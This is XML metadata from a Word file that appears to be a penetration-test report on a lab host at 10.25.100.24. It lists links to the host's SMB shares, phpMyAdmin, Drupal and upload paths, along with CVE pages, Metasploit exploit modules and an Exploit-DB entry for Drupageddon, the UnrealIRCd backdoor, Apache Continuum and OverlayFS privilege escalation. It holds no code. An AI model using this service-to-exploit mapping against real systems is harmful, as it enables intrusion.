    <w:div w:id="19602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2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10.25.100.24:80/chat/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2014-3704/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/linux/http/apache_continuum_cmd_exec" TargetMode="External"/><Relationship Id="rId39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3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId42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://10.25.100.24:80/uploads/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\10.25.100.24\public" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\10.25.100.24\print$" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.PNG"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/linux/local/overlayfs_priv_esc" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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10.25.100.24:80/phpmyadmin/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor" TargetMode="External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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpe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file:///\\10.25.100.24\IPC$" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2010-2075/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2015-1328/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.25.100.24:80/payroll_app.php" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/raw/37292" TargetMode="External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10.25.100.24:80/drupal/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.25.100.24:80/icons/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6.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.PNG"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId4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6FD1F6-59E3-4452-ACE2-3C2C5E695E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25</Pages>
  <Words>2001</Words>
  <Characters>11410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Mason</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mason Gill</cp:lastModifiedBy>
  <cp:revision>139</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-26T09:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-01T06:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>